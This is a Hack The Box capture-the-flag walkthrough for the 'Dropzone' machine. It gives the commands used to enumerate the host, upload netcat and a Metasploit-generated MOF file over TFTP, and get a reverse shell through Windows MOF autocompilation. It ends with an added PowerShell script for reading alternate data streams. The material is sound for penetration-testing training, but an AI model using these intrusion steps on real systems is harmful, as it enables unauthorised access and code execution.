Hack The Box: Dropzone




Difficulty: Medium
Machine Creator: eks & rjesh
Tools Used: NMAP, TFTP, Metasploit, NC, Streams

Task: To find User.txt and Root.txt

Network Enumeration

Let's start with NMAP scans: a TCP service and script scan first, then a UDP scan, since TFTP runs over UDP.

nmap -sV -sC 10.10.10.90

nmap -sU 10.10.10.90

TFTP

Connect to the TFTP service with the command-line tftp client.

tftp 10.10.10.90




Metasploit

Now we need to start generating our payload. We can exploit WMI using a helper from the psexec module in MSF. First, we need to select the psexec module:

use exploit/windows/smb/psexec

Then we need to drop down into an interactive Ruby shell:

irb

Now we need to generate our MOF file. generate_mof takes two placeholder names and prints a MOF template; we put the NC command, along with our local IP and port 1337, into it.

puts generate_mof("test1", "test2")



Upload NC.exe

NC.exe is not in Windows by default, so we need to upload it using TFTP.

First, we should copy nc.exe to our current directory (the trailing dot is the destination).

cp /usr/share/windows-binaries/nc.exe .

Now we can upload nc.exe to the remote server.


NC Listener

nc -lvnp 1337

1337 is our local port to listen on.

Upload mof file

Windows automatically compiles any .mof file placed in the directory we upload to, so the upload alone triggers execution of the file.

put exploit.mof /windows/system32/wbem/mof/exploit.mof

Root.txt


We have another directory on the desktop for flags, so let's check that out.


Streams

We need to download a program called Streams by Sysinternals; it allows us to view alternate data streams.

https://docs.microsoft.com/en-us/sysinternals/downloads/streams

Now we can view the file using Streams. Sysinternals tools always require you to accept the EULA (hence -accepteula), and we can use a wildcard character for the file name.

streams -accepteula 2*
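As an added example that is not part of the original writeup, the same alternate data stream check done with built-in PowerShell cmdlets (3.0 or later), so no Sysinternals download is needed; it assumes the flag files have been copied to a modern Windows host, and the directory path is a placeholder.

```powershell
# Added example (not from the original writeup): enumerate and read alternate
# data streams with built-in PowerShell instead of Sysinternals streams.exe.
# The directory below is a placeholder; point it at the copied flags folder.
param(
    [string]$Path = 'C:\Users\<user>\Desktop\flags'   # placeholder path
)

# Every NTFS file has the unnamed ':$DATA' stream; anything else is an ADS.
function Get-AlternateStreams {
    param([string]$Directory)
    Get-ChildItem -Path $Directory -File -Recurse | ForEach-Object {
        $file = $_
        Get-Item -Path $file.FullName -Stream * -ErrorAction SilentlyContinue |
            Where-Object { $_.Stream -ne ':$DATA' } |
            ForEach-Object {
                [pscustomobject]@{
                    File   = $file.FullName
                    Stream = $_.Stream
                    Length = $_.Length
                }
            }
    }
}

# Read the content of one named stream (e.g. stream 'hidden' of file.txt).
function Read-AlternateStream {
    param([string]$File, [string]$Stream)
    Get-Content -Path $File -Stream $Stream -Raw
}

$streams = Get-AlternateStreams -Directory $Path
if (-not $streams) {
    Write-Host "No alternate data streams found under $Path"
} else {
    $streams | Format-Table -AutoSize
    foreach ($s in $streams) {
        Write-Host "--- $($s.File):$($s.Stream) ---"
        Read-AlternateStream -File $s.File -Stream $s.Stream
    }
}
```

In a plain cmd.exe prompt, `dir /r` also lists named streams next to each file, which is a quick way to confirm what Streams reports.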